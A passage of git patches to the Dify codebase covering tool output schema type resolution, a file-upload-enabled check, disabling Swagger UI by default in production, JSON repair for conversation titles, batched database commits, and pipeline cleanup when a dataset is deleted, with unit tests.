a/web/app/components/workflow/nodes/tool/default.ts +++ b/web/app/components/workflow/nodes/tool/default.ts @@ -1,12 +1,13 @@ import { genNodeMetaData } from '@/app/components/workflow/utils' -import { BlockEnum, VarType } from '@/app/components/workflow/types' -import type { NodeDefault, ToolWithProvider } from '../../types' +import { BlockEnum } from '@/app/components/workflow/types' +import type { NodeDefault, ToolWithProvider, Var } from '../../types' import type { ToolNodeType } from './types' import { VarType as VarKindType } from '@/app/components/workflow/nodes/tool/types' import { TOOL_OUTPUT_STRUCT } from '../../constants' import { CollectionType } from '@/app/components/tools/types' import { canFindTool } from '@/utils' -import { getMatchedSchemaType } from '../_base/components/variable/use-match-schema-type' +import { Type } from '../llm/types' +import { resolveVarType } from './output-schema-utils' const i18nPrefix = 'workflow.errorMsg' @@ -88,32 +89,26 @@ const nodeDefault: NodeDefault = { const currCollection = currentTools.find(item => canFindTool(item.id, provider_id)) const currTool = currCollection?.tools.find(tool => tool.name === payload.tool_name) const output_schema = currTool?.output_schema - let res: any[] = [] + let res: Var[] = [] if (!output_schema || !output_schema.properties) { res = TOOL_OUTPUT_STRUCT } else { - const outputSchema: any[] = [] + const outputSchema: Var[] = [] Object.keys(output_schema.properties).forEach((outputKey) => { const output = output_schema.properties[outputKey] - const dataType = output.type - const schemaType = getMatchedSchemaType(output, schemaTypeDefinitions) - let type = dataType === 'array' - ? `Array[${output.items?.type ? output.items.type.slice(0, 1).toLocaleLowerCase() + output.items.type.slice(1) : 'Unknown'}]` - : `${output.type ? output.type.slice(0, 1).toLocaleLowerCase() + output.type.slice(1) : 'Unknown'}` - - if (type === VarType.object && schemaType === 'file') - type = VarType.file + const { type, schemaType } = resolveVarType(output, schemaTypeDefinitions) outputSchema.push({ variable: outputKey, type, - description: output.description, + des: output.description, schemaType, children: output.type === 'object' ? { schema: { - type: 'object', + type: Type.object, properties: output.properties, + additionalProperties: false, }, } : undefined, }) diff --git a/web/app/components/workflow/nodes/tool/output-schema-utils.ts b/web/app/components/workflow/nodes/tool/output-schema-utils.ts new file mode 100644 index 0000000000..684ff0b29f --- /dev/null +++ b/web/app/components/workflow/nodes/tool/output-schema-utils.ts @@ -0,0 +1,101 @@ +import { VarType } from '@/app/components/workflow/types' +import { getMatchedSchemaType } from '../_base/components/variable/use-match-schema-type' +import type { SchemaTypeDefinition } from '@/service/use-common' + +/** + * Normalizes a JSON Schema type to a simple string type. + * Handles complex schemas with oneOf, anyOf, allOf. + */ +export const normalizeJsonSchemaType = (schema: any): string | undefined => { + if (!schema) return undefined + const { type, properties, items, oneOf, anyOf, allOf } = schema + + if (Array.isArray(type)) + return type.find((item: string | null) => item && item !== 'null') || type[0] + + if (typeof type === 'string') + return type + + const compositeCandidates = [oneOf, anyOf, allOf] + .filter((entry): entry is any[] => Array.isArray(entry)) + .flat() + + for (const candidate of compositeCandidates) { + const normalized = normalizeJsonSchemaType(candidate) + if (normalized) + return normalized + } + + if (properties) + return 'object' + + if (items) + return 'array' + + return undefined +} + +/** + * Extracts the items schema from an array schema. + */ +export const pickItemSchema = (schema: any) => { + if (!schema || !schema.items) + return undefined + return Array.isArray(schema.items) ? schema.items[0] : schema.items +} + +/** + * Resolves a JSON Schema to a VarType enum value. + * Properly handles array types by inspecting item types. + */ +export const resolveVarType = ( + schema: any, + schemaTypeDefinitions?: SchemaTypeDefinition[], +): { type: VarType; schemaType?: string } => { + const schemaType = getMatchedSchemaType(schema, schemaTypeDefinitions) + const normalizedType = normalizeJsonSchemaType(schema) + + switch (normalizedType) { + case 'string': + return { type: VarType.string, schemaType } + case 'number': + return { type: VarType.number, schemaType } + case 'integer': + return { type: VarType.integer, schemaType } + case 'boolean': + return { type: VarType.boolean, schemaType } + case 'object': + if (schemaType === 'file') + return { type: VarType.file, schemaType } + return { type: VarType.object, schemaType } + case 'array': { + const itemSchema = pickItemSchema(schema) + if (!itemSchema) + return { type: VarType.array, schemaType } + + const { type: itemType, schemaType: itemSchemaType } = resolveVarType(itemSchema, schemaTypeDefinitions) + const resolvedSchemaType = schemaType || itemSchemaType + + if (itemSchemaType === 'file') + return { type: VarType.arrayFile, schemaType: resolvedSchemaType } + + switch (itemType) { + case VarType.string: + return { type: VarType.arrayString, schemaType: resolvedSchemaType } + case VarType.number: + case VarType.integer: + return { type: VarType.arrayNumber, schemaType: resolvedSchemaType } + case VarType.boolean: + return { type: VarType.arrayBoolean, schemaType: resolvedSchemaType } + case VarType.object: + return { type: VarType.arrayObject, schemaType: resolvedSchemaType } + case VarType.file: + return { type: VarType.arrayFile, schemaType: resolvedSchemaType } + default: + return { type: VarType.array, schemaType: resolvedSchemaType } + } + } + default: + return { type: VarType.any, schemaType } + } +} From 7fead6a9da86981b8357e68c00e9ffc3b3ae18d0 Mon Sep 17 00:00:00 2001 From: Gen Sato <52241300+halogen22@users.noreply.github.com> Date: Mon, 15 Dec 2025 12:18:05 +0900 Subject: [PATCH 14/68] Add file upload enabled check and new i18n message (#28946) --- .../components/base/file-uploader/hooks.ts | 23 ++++++------------- web/i18n/en-US/common.ts | 1 + web/i18n/ja-JP/common.ts | 1 + 3 files changed, 9 insertions(+), 16 deletions(-) diff --git a/web/app/components/base/file-uploader/hooks.ts b/web/app/components/base/file-uploader/hooks.ts index 521ecdbafd..baef5ff7d8 100644 --- a/web/app/components/base/file-uploader/hooks.ts +++ b/web/app/components/base/file-uploader/hooks.ts @@ -246,6 +246,11 @@ export const useFile = (fileConfig: FileUpload) => { }, [fileStore]) const handleLocalFileUpload = useCallback((file: File) => { + // Check file upload enabled + if (!fileConfig.enabled) { + notify({ type: 'error', message: t('common.fileUploader.uploadDisabled') }) + return + } if (!isAllowedFileExtension(file.name, file.type, fileConfig.allowed_file_types || [], fileConfig.allowed_file_extensions || [])) { notify({ type: 'error', message: `${t('common.fileUploader.fileExtensionNotSupport')} ${file.type}` }) return @@ -298,30 +303,16 @@ export const useFile = (fileConfig: FileUpload) => { false, ) reader.readAsDataURL(file) - }, [checkSizeLimit, notify, t, handleAddFile, handleUpdateFile, params.token, fileConfig?.allowed_file_types, fileConfig?.allowed_file_extensions]) + }, [checkSizeLimit, notify, t, handleAddFile, handleUpdateFile, params.token, fileConfig?.allowed_file_types, fileConfig?.allowed_file_extensions, fileConfig?.enabled]) const handleClipboardPasteFile = useCallback((e: ClipboardEvent) => { const file = e.clipboardData?.files[0] const text = e.clipboardData?.getData('text/plain') if (file && !text) { e.preventDefault() - - const allowedFileTypes = fileConfig.allowed_file_types || [] - const fileType = getSupportFileType(file.name, file.type, allowedFileTypes?.includes(SupportUploadFileTypes.custom)) - const isFileTypeAllowed = allowedFileTypes.includes(fileType) - - // Check if file type is in allowed list - if (!isFileTypeAllowed || !fileConfig.enabled) { - notify({ - type: 'error', - message: t('common.fileUploader.fileExtensionNotSupport'), - }) - return - } - handleLocalFileUpload(file) } - }, [handleLocalFileUpload, fileConfig, notify, t]) + }, [handleLocalFileUpload]) const [isDragActive, setIsDragActive] = useState(false) const handleDragFileEnter = useCallback((e: React.DragEvent) => { diff --git a/web/i18n/en-US/common.ts b/web/i18n/en-US/common.ts index 26c6ed89f2..11cc866fde 100644 --- a/web/i18n/en-US/common.ts +++ b/web/i18n/en-US/common.ts @@ -743,6 +743,7 @@ const translation = { pasteFileLinkInvalid: 'Invalid file link', fileExtensionNotSupport: 'File extension not supported', fileExtensionBlocked: 'This file type is blocked for security reasons', + uploadDisabled: 'File upload is disabled', }, tag: { placeholder: 'All Tags', diff --git a/web/i18n/ja-JP/common.ts b/web/i18n/ja-JP/common.ts index 984161a114..2f7bb13fb5 100644 --- a/web/i18n/ja-JP/common.ts +++ b/web/i18n/ja-JP/common.ts @@ -747,6 +747,7 @@ const translation = { uploadFromComputerReadError: 'ファイルの読み取りに失敗しました。もう一度やり直してください。', fileExtensionNotSupport: 'ファイル拡張子はサポートされていません', pasteFileLinkInvalid: '無効なファイルリンク', + uploadDisabled: 'ファイルアップロードは無効です', fileExtensionBlocked: 'このファイルタイプは、セキュリティ上の理由でブロックされています', }, license: { From 355a2356d4c084499f7e6796786dcb6600aec9c9 Mon Sep 17 00:00:00 2001 From: L1nSn0w Date: Mon, 15 Dec 2025 11:24:06 +0800 Subject: [PATCH 15/68] security/fix-swagger-info-leak-m02 (#29283) Co-authored-by: crazywoola <100913391+crazywoola@users.noreply.github.com> --- api/.env.example | 12 +++++++++++- api/configs/feature/__init__.py | 33 ++++++++++++++++++++++++++++++--- api/extensions/ext_login.py | 4 ++-- api/libs/external_api.py | 20 ++++++++++++++++++-- 4 files changed, 61 insertions(+), 8 deletions(-) diff --git a/api/.env.example b/api/.env.example index 516a119d98..fb92199893 100644 --- a/api/.env.example +++ b/api/.env.example @@ -626,7 +626,17 @@ QUEUE_MONITOR_ALERT_EMAILS= QUEUE_MONITOR_INTERVAL=30 # Swagger UI configuration -SWAGGER_UI_ENABLED=true +# SECURITY: Swagger UI is automatically disabled in PRODUCTION environment (DEPLOY_ENV=PRODUCTION) +# to prevent API information disclosure. +# +# Behavior: +# - DEPLOY_ENV=PRODUCTION + SWAGGER_UI_ENABLED not set -> Swagger DISABLED (secure default) +# - DEPLOY_ENV=DEVELOPMENT/TESTING + SWAGGER_UI_ENABLED not set -> Swagger ENABLED +# - SWAGGER_UI_ENABLED=true -> Swagger ENABLED (overrides environment check) +# - SWAGGER_UI_ENABLED=false -> Swagger DISABLED (explicit disable) +# +# For development, you can uncomment below or set DEPLOY_ENV=DEVELOPMENT +# SWAGGER_UI_ENABLED=false SWAGGER_UI_PATH=/swagger-ui.html # Whether to encrypt dataset IDs when exporting DSL files (default: true) diff --git a/api/configs/feature/__init__.py b/api/configs/feature/__init__.py index a5916241df..5c0edb60ac 100644 --- a/api/configs/feature/__init__.py +++ b/api/configs/feature/__init__.py @@ -1221,9 +1221,19 @@ class WorkflowLogConfig(BaseSettings): class SwaggerUIConfig(BaseSettings): - SWAGGER_UI_ENABLED: bool = Field( - description="Whether to enable Swagger UI in api module", - default=True, + """ + Configuration for Swagger UI documentation. + + Security Note: Swagger UI is automatically disabled in PRODUCTION environment + to prevent API information disclosure. Set SWAGGER_UI_ENABLED=true explicitly + to enable in production if needed. + """ + + SWAGGER_UI_ENABLED: bool | None = Field( + description="Whether to enable Swagger UI in api module. " + "Automatically disabled in PRODUCTION environment for security. " + "Set to true explicitly to enable in production.", + default=None, ) SWAGGER_UI_PATH: str = Field( @@ -1231,6 +1241,23 @@ class SwaggerUIConfig(BaseSettings): default="/swagger-ui.html", ) + @property + def swagger_ui_enabled(self) -> bool: + """ + Compute whether Swagger UI should be enabled. + + If SWAGGER_UI_ENABLED is explicitly set, use that value. + Otherwise, disable in PRODUCTION environment for security. + """ + if self.SWAGGER_UI_ENABLED is not None: + return self.SWAGGER_UI_ENABLED + + # Auto-disable in production environment + import os + + deploy_env = os.environ.get("DEPLOY_ENV", "PRODUCTION") + return deploy_env.upper() != "PRODUCTION" + class TenantIsolatedTaskQueueConfig(BaseSettings): TENANT_ISOLATED_TASK_CONCURRENCY: int = Field( diff --git a/api/extensions/ext_login.py b/api/extensions/ext_login.py index 74299956c0..5cbdd4db12 100644 --- a/api/extensions/ext_login.py +++ b/api/extensions/ext_login.py @@ -22,8 +22,8 @@ login_manager = flask_login.LoginManager() @login_manager.request_loader def load_user_from_request(request_from_flask_login): """Load user based on the request.""" - # Skip authentication for documentation endpoints - if dify_config.SWAGGER_UI_ENABLED and request.path.endswith((dify_config.SWAGGER_UI_PATH, "/swagger.json")): + # Skip authentication for documentation endpoints (only when Swagger is enabled) + if dify_config.swagger_ui_enabled and request.path.endswith((dify_config.SWAGGER_UI_PATH, "/swagger.json")): return None auth_token = extract_access_token(request) diff --git a/api/libs/external_api.py b/api/libs/external_api.py index 61a90ee4a9..31ca2b3e08 100644 --- a/api/libs/external_api.py +++ b/api/libs/external_api.py @@ -131,12 +131,28 @@ class ExternalApi(Api): } def __init__(self, app: Blueprint | Flask, *args, **kwargs): + import logging + import os + kwargs.setdefault("authorizations", self._authorizations) kwargs.setdefault("security", "Bearer") - kwargs["add_specs"] = dify_config.SWAGGER_UI_ENABLED - kwargs["doc"] = dify_config.SWAGGER_UI_PATH if dify_config.SWAGGER_UI_ENABLED else False + + # Security: Use computed swagger_ui_enabled which respects DEPLOY_ENV + swagger_enabled = dify_config.swagger_ui_enabled + kwargs["add_specs"] = swagger_enabled + kwargs["doc"] = dify_config.SWAGGER_UI_PATH if swagger_enabled else False # manual separate call on construction and init_app to ensure configs in kwargs effective super().__init__(app=None, *args, **kwargs) self.init_app(app, **kwargs) register_external_error_handlers(self) + + # Security: Log warning when Swagger is enabled in production environment + deploy_env = os.environ.get("DEPLOY_ENV", "PRODUCTION") + if swagger_enabled and deploy_env.upper() == "PRODUCTION": + logger = logging.getLogger(__name__) + logger.warning( + "SECURITY WARNING: Swagger UI is ENABLED in PRODUCTION environment. " + "This may expose sensitive API documentation. " + "Set SWAGGER_UI_ENABLED=false or remove the explicit setting to disable." + ) From 1a18012f98871d9ae959dbaabceb7edbd84de123 Mon Sep 17 00:00:00 2001 From: quicksand Date: Mon, 15 Dec 2025 11:29:28 +0800 Subject: [PATCH 16/68] fix(api): use json_repair for conversation title parsing (#29649) --- api/core/llm_generator/llm_generator.py | 17 ++++++++++++----- 1 file changed, 12 insertions(+), 5 deletions(-) diff --git a/api/core/llm_generator/llm_generator.py b/api/core/llm_generator/llm_generator.py index 4a577e6c38..b4c3ec1caf 100644 --- a/api/core/llm_generator/llm_generator.py +++ b/api/core/llm_generator/llm_generator.py @@ -72,15 +72,22 @@ class LLMGenerator: prompt_messages=list(prompts), model_parameters={"max_tokens": 500, "temperature": 1}, stream=False ) answer = cast(str, response.message.content) - cleaned_answer = re.sub(r"^.*(\{.*\}).*$", r"\1", answer, flags=re.DOTALL) - if cleaned_answer is None: + if answer is None: return "" try: - result_dict = json.loads(cleaned_answer) - answer = result_dict["Your Output"] + result_dict = json.loads(answer) except json.JSONDecodeError: - logger.exception("Failed to generate name after answer, use query instead") + result_dict = json_repair.loads(answer) + + if not isinstance(result_dict, dict): answer = query + else: + output = result_dict.get("Your Output") + if isinstance(output, str) and output.strip(): + answer = output.strip() + else: + answer = query + name = answer.strip() if len(name) > 75: From 8f3fd9a728ef43aec8103548888f1744678a72d6 Mon Sep 17 00:00:00 2001 From: wangxiaolei Date: Mon, 15 Dec 2025 11:40:26 +0800 Subject: [PATCH 17/68] perf: commit once (#29590) --- api/core/rag/extractor/word_extractor.py | 10 +-- .../core/rag/extractor/test_word_extractor.py | 85 +++++++++++++++++++ 2 files changed, 89 insertions(+), 6 deletions(-) diff --git a/api/core/rag/extractor/word_extractor.py b/api/core/rag/extractor/word_extractor.py index 438932cfd6..044b118635 100644 --- a/api/core/rag/extractor/word_extractor.py +++ b/api/core/rag/extractor/word_extractor.py @@ -84,7 +84,7 @@ class WordExtractor(BaseExtractor): image_count = 0 image_map = {} - for rId, rel in doc.part.rels.items(): + for r_id, rel in doc.part.rels.items(): if "image" in rel.target_ref: image_count += 1 if rel.is_external: @@ -121,9 +121,8 @@ class WordExtractor(BaseExtractor): used_at=naive_utc_now(), ) db.session.add(upload_file) - db.session.commit() - # Use rId as key for external images since target_part is undefined - image_map[rId] = f"![image]({dify_config.FILES_URL}/files/{upload_file.id}/file-preview)" + # Use r_id as key for external images since target_part is undefined + image_map[r_id] = f"![image]({dify_config.FILES_URL}/files/{upload_file.id}/file-preview)" else: image_ext = rel.target_ref.split(".")[-1] if image_ext is None: @@ -151,12 +150,11 @@ class WordExtractor(BaseExtractor): used_at=naive_utc_now(), ) db.session.add(upload_file) - db.session.commit() # Use target_part as key for internal images image_map[rel.target_part] = ( f"![image]({dify_config.FILES_URL}/files/{upload_file.id}/file-preview)" ) - + db.session.commit() return image_map def _table_to_markdown(self, table, image_map): diff --git a/api/tests/unit_tests/core/rag/extractor/test_word_extractor.py b/api/tests/unit_tests/core/rag/extractor/test_word_extractor.py index 3635e4dbf9..fd0b0e2e44 100644 --- a/api/tests/unit_tests/core/rag/extractor/test_word_extractor.py +++ b/api/tests/unit_tests/core/rag/extractor/test_word_extractor.py @@ -1,7 +1,10 @@ """Primarily used for testing merged cell scenarios""" +from types import SimpleNamespace + from docx import Document +import core.rag.extractor.word_extractor as we from core.rag.extractor.word_extractor import WordExtractor @@ -47,3 +50,85 @@ def test_parse_row(): extractor = object.__new__(WordExtractor) for idx, row in enumerate(table.rows): assert extractor._parse_row(row, {}, 3) == gt[idx] + + +def test_extract_images_from_docx(monkeypatch): + external_bytes = b"ext-bytes" + internal_bytes = b"int-bytes" + + # Patch storage.save to capture writes + saves: list[tuple[str, bytes]] = [] + + def save(key: str, data: bytes): + saves.append((key, data)) + + monkeypatch.setattr(we, "storage", SimpleNamespace(save=save)) + + # Patch db.session to record adds/commit + class DummySession: + def __init__(self): + self.added = [] + self.committed = False + + def add(self, obj): + self.added.append(obj) + + def commit(self): + self.committed = True + + db_stub = SimpleNamespace(session=DummySession()) + monkeypatch.setattr(we, "db", db_stub) + + # Patch config values used for URL composition and storage type + monkeypatch.setattr(we.dify_config, "FILES_URL", "http://files.local", raising=False) + monkeypatch.setattr(we.dify_config, "STORAGE_TYPE", "local", raising=False) + + # Patch UploadFile to avoid real DB models + class FakeUploadFile: + _i = 0 + + def __init__(self, **kwargs): # kwargs match the real signature fields + type(self)._i += 1 + self.id = f"u{self._i}" + + monkeypatch.setattr(we, "UploadFile", FakeUploadFile) + + # Patch external image fetcher + def fake_get(url: str): + assert url == "https://example.com/image.png" + return SimpleNamespace(status_code=200, headers={"Content-Type": "image/png"}, content=external_bytes) + + monkeypatch.setattr(we, "ssrf_proxy", SimpleNamespace(get=fake_get)) + + # A hashable internal part object with a blob attribute + class HashablePart: + def __init__(self, blob: bytes): + self.blob = blob + + def __hash__(self) -> int: # ensure it can be used as a dict key like real docx parts + return id(self) + + # Build a minimal doc object with both external and internal image rels + internal_part = HashablePart(blob=internal_bytes) + rel_ext = SimpleNamespace(is_external=True, target_ref="https://example.com/image.png") + rel_int = SimpleNamespace(is_external=False, target_ref="word/media/image1.png", target_part=internal_part) + doc = SimpleNamespace(part=SimpleNamespace(rels={"rId1": rel_ext, "rId2": rel_int})) + + extractor = object.__new__(WordExtractor) + extractor.tenant_id = "t1" + extractor.user_id = "u1" + + image_map = extractor._extract_images_from_docx(doc) + + # Returned map should contain entries for external (keyed by rId) and internal (keyed by target_part) + assert set(image_map.keys()) == {"rId1", internal_part} + assert all(v.startswith("![image](") and v.endswith("/file-preview)") for v in image_map.values()) + + # Storage should receive both payloads + payloads = {data for _, data in saves} + assert external_bytes in payloads + assert internal_bytes in payloads + + # DB interactions should be recorded + assert len(db_stub.session.added) == 2 + assert db_stub.session.committed is True From acef56d7fd6d913272666b1dfe2a5b2a981f2fcd Mon Sep 17 00:00:00 2001 From: Jyong <76649700+JohnJyong@users.noreply.github.com> Date: Mon, 15 Dec 2025 12:00:03 +0800 Subject: [PATCH 18/68] fix: delete knowledge pipeline but pipeline and workflow don't delete (#29591) Co-authored-by: autofix-ci[bot] <114827586+autofix-ci[bot]@users.noreply.github.com> --- .../clean_when_dataset_deleted.py | 1 + api/tasks/clean_dataset_task.py | 12 + .../tasks/test_clean_dataset_task.py | 1232 +++++++++++++++++ 3 files changed, 1245 insertions(+) create mode 100644 api/tests/unit_tests/tasks/test_clean_dataset_task.py diff --git a/api/events/event_handlers/clean_when_dataset_deleted.py b/api/events/event_handlers/clean_when_dataset_deleted.py index 1666e2e29f..d6007662d8 100644 --- a/api/events/event_handlers/clean_when_dataset_deleted.py +++ b/api/events/event_handlers/clean_when_dataset_deleted.py @@ -15,4 +15,5 @@ def handle(sender: Dataset, **kwargs): dataset.index_struct, dataset.collection_binding_id, dataset.doc_form, + dataset.pipeline_id, ) diff --git a/api/tasks/clean_dataset_task.py b/api/tasks/clean_dataset_task.py index 8608df6b8e..b4d82a150d 100644 --- a/api/tasks/clean_dataset_task.py +++ b/api/tasks/clean_dataset_task.py @@ -9,6 +9,7 @@ from core.rag.index_processor.index_processor_factory import IndexProcessorFacto from core.tools.utils.web_reader_tool import get_image_upload_file_ids from extensions.ext_database import db from extensions.ext_storage import storage +from models import WorkflowType from models.dataset import ( AppDatasetJoin, Dataset, @@ -18,9 +19,11 @@ from models.dataset import ( DatasetQuery, Document, DocumentSegment, + Pipeline, SegmentAttachmentBinding, ) from models.model import UploadFile +from models.workflow import Workflow logger = logging.getLogger(__name__) @@ -34,6 +37,7 @@ def clean_dataset_task( index_struct: str, collection_binding_id: str, doc_form: str, + pipeline_id: str | None = None, ): """ Clean dataset when dataset deleted. @@ -135,6 +139,14 @@ def clean_dataset_task( # delete dataset metadata db.session.query(DatasetMetadata).where(DatasetMetadata.dataset_id == dataset_id).delete() db.session.query(DatasetMetadataBinding).where(DatasetMetadataBinding.dataset_id == dataset_id).delete() + # delete pipeline and workflow + if pipeline_id: + db.session.query(Pipeline).where(Pipeline.id == pipeline_id).delete() + db.session.query(Workflow).where( + Workflow.tenant_id == tenant_id, + Workflow.app_id == pipeline_id, + Workflow.type == WorkflowType.RAG_PIPELINE, + ).delete() # delete files if documents: for document in documents: diff --git a/api/tests/unit_tests/tasks/test_clean_dataset_task.py b/api/tests/unit_tests/tasks/test_clean_dataset_task.py new file mode 100644 index 0000000000..bace66bec4 --- /dev/null +++ b/api/tests/unit_tests/tasks/test_clean_dataset_task.py @@ -0,0 +1,1232 @@ +""" +Unit tests for clean_dataset_task. + +This module tests the dataset cleanup task functionality including: +- Basic cleanup of documents and segments +- Vector database cleanup with IndexProcessorFactory +- Storage file deletion +- Invalid doc_form handling with default fallback +- Error handling and database session rollback +- Pipeline and workflow deletion +- Segment attachment cleanup +""" + +import uuid +from unittest.mock import MagicMock, patch + +import pytest + +from tasks.clean_dataset_task import clean_dataset_task + +# ============================================================================ +# Fixtures +# ============================================================================ + + +@pytest.fixture +def tenant_id(): + """Generate a unique tenant ID for testing.""" + return str(uuid.uuid4()) + + +@pytest.fixture +def dataset_id(): + """Generate a unique dataset ID for testing.""" + return str(uuid.uuid4()) + + +@pytest.fixture +def collection_binding_id(): + """Generate a unique collection binding ID for testing.""" + return str(uuid.uuid4()) + + +@pytest.fixture +def pipeline_id(): + """Generate a unique pipeline ID for testing.""" + return str(uuid.uuid4()) + + +@pytest.fixture +def mock_db_session(): + """Mock database session with query capabilities.""" + with patch("tasks.clean_dataset_task.db") as mock_db: + mock_session = MagicMock() + mock_db.session = mock_session + + # Setup query chain + mock_query = MagicMock() + mock_session.query.return_value = mock_query + mock_query.where.return_value = mock_query + mock_query.delete.return_value = 0 + + # Setup scalars for select queries + mock_session.scalars.return_value.all.return_value = [] + + # Setup execute for JOIN queries + mock_session.execute.return_value.all.return_value = [] + + yield mock_db + + +@pytest.fixture +def mock_storage(): + """Mock storage client.""" + with patch("tasks.clean_dataset_task.storage") as mock_storage: + mock_storage.delete.return_value = None + yield mock_storage + + +@pytest.fixture +def mock_index_processor_factory(): + """Mock IndexProcessorFactory.""" + with patch("tasks.clean_dataset_task.IndexProcessorFactory") as mock_factory: + mock_processor = MagicMock() + mock_processor.clean.return_value = None + mock_factory_instance = MagicMock() + mock_factory_instance.init_index_processor.return_value = mock_processor + mock_factory.return_value = mock_factory_instance + + yield { + "factory": mock_factory, + "factory_instance": mock_factory_instance, + "processor": mock_processor, + } + + +@pytest.fixture +def mock_get_image_upload_file_ids(): + """Mock get_image_upload_file_ids function.""" + with patch("tasks.clean_dataset_task.get_image_upload_file_ids") as mock_func: + mock_func.return_value = [] + yield mock_func + + +@pytest.fixture +def mock_document(): + """Create a mock Document object.""" + doc = MagicMock() + doc.id = str(uuid.uuid4()) + doc.tenant_id = str(uuid.uuid4()) + doc.dataset_id = str(uuid.uuid4()) + doc.data_source_type = "upload_file" + doc.data_source_info = '{"upload_file_id": "test-file-id"}' + doc.data_source_info_dict = {"upload_file_id": "test-file-id"} + return doc + + +@pytest.fixture +def mock_segment(): + """Create a mock DocumentSegment object.""" + segment = MagicMock() + segment.id = str(uuid.uuid4()) + segment.content = "Test segment content" + return segment + + +@pytest.fixture +def mock_upload_file(): + """Create a mock UploadFile object.""" + upload_file = MagicMock() + upload_file.id = str(uuid.uuid4()) + upload_file.key = f"test_files/{uuid.uuid4()}.txt" + return upload_file + + +# ============================================================================ +# Test Basic Cleanup +# ============================================================================ + + +class TestBasicCleanup: + """Test cases for basic dataset cleanup functionality.""" + + def test_clean_dataset_task_empty_dataset( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test cleanup of an empty dataset with no documents or segments. + + Scenario: + - Dataset has no documents or segments + - Should still clean vector database and delete related records + + Expected behavior: + - IndexProcessorFactory is called to clean vector database + - No storage deletions occur + - Related records (DatasetProcessRule, etc.) are deleted + - Session is committed and closed + """ + # Arrange + mock_db_session.session.scalars.return_value.all.return_value = [] + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_index_processor_factory["factory"].assert_called_once_with("paragraph_index") + mock_index_processor_factory["processor"].clean.assert_called_once() + mock_storage.delete.assert_not_called() + mock_db_session.session.commit.assert_called_once() + mock_db_session.session.close.assert_called_once() + + def test_clean_dataset_task_with_documents_and_segments( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + mock_document, + mock_segment, + ): + """ + Test cleanup of dataset with documents and segments. + + Scenario: + - Dataset has one document and one segment + - No image files in segment content + + Expected behavior: + - Documents and segments are deleted + - Vector database is cleaned + - Session is committed + """ + # Arrange + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents + [mock_segment], # segments + ] + mock_get_image_upload_file_ids.return_value = [] + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_db_session.session.delete.assert_any_call(mock_document) + mock_db_session.session.delete.assert_any_call(mock_segment) + mock_db_session.session.commit.assert_called_once() + + def test_clean_dataset_task_deletes_related_records( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that all related records are deleted. + + Expected behavior: + - DatasetProcessRule records are deleted + - DatasetQuery records are deleted + - AppDatasetJoin records are deleted + - DatasetMetadata records are deleted + - DatasetMetadataBinding records are deleted + """ + # Arrange + mock_query = mock_db_session.session.query.return_value + mock_query.where.return_value = mock_query + mock_query.delete.return_value = 1 + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert - verify query.where.delete was called multiple times + # for different models (DatasetProcessRule, DatasetQuery, etc.) + assert mock_query.delete.call_count >= 5 + + +# ============================================================================ +# Test Doc Form Validation +# ============================================================================ + + +class TestDocFormValidation: + """Test cases for doc_form validation and default fallback.""" + + @pytest.mark.parametrize( + "invalid_doc_form", + [ + None, + "", + " ", + "\t", + "\n", + " \t\n ", + ], + ) + def test_clean_dataset_task_invalid_doc_form_uses_default( + self, + invalid_doc_form, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that invalid doc_form values use default paragraph index type. + + Scenario: + - doc_form is None, empty, or whitespace-only + - Should use default IndexStructureType.PARAGRAPH_INDEX + + Expected behavior: + - Default index type is used for cleanup + - No errors are raised + - Cleanup proceeds normally + """ + # Arrange - import to verify the default value + from core.rag.index_processor.constant.index_type import IndexStructureType + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form=invalid_doc_form, + ) + + # Assert - IndexProcessorFactory should be called with default type + mock_index_processor_factory["factory"].assert_called_once_with(IndexStructureType.PARAGRAPH_INDEX) + mock_index_processor_factory["processor"].clean.assert_called_once() + + def test_clean_dataset_task_valid_doc_form_used_directly( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that valid doc_form values are used directly. + + Expected behavior: + - Provided doc_form is passed to IndexProcessorFactory + """ + # Arrange + valid_doc_form = "qa_index" + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form=valid_doc_form, + ) + + # Assert + mock_index_processor_factory["factory"].assert_called_once_with(valid_doc_form) + + +# ============================================================================ +# Test Error Handling +# ============================================================================ + + +class TestErrorHandling: + """Test cases for error handling and recovery.""" + + def test_clean_dataset_task_vector_cleanup_failure_continues( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + mock_document, + mock_segment, + ): + """ + Test that document cleanup continues even if vector cleanup fails. + + Scenario: + - IndexProcessor.clean() raises an exception + - Document and segment deletion should still proceed + + Expected behavior: + - Exception is caught and logged + - Documents and segments are still deleted + - Session is committed + """ + # Arrange + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents + [mock_segment], # segments + ] + mock_index_processor_factory["processor"].clean.side_effect = Exception("Vector database error") + + 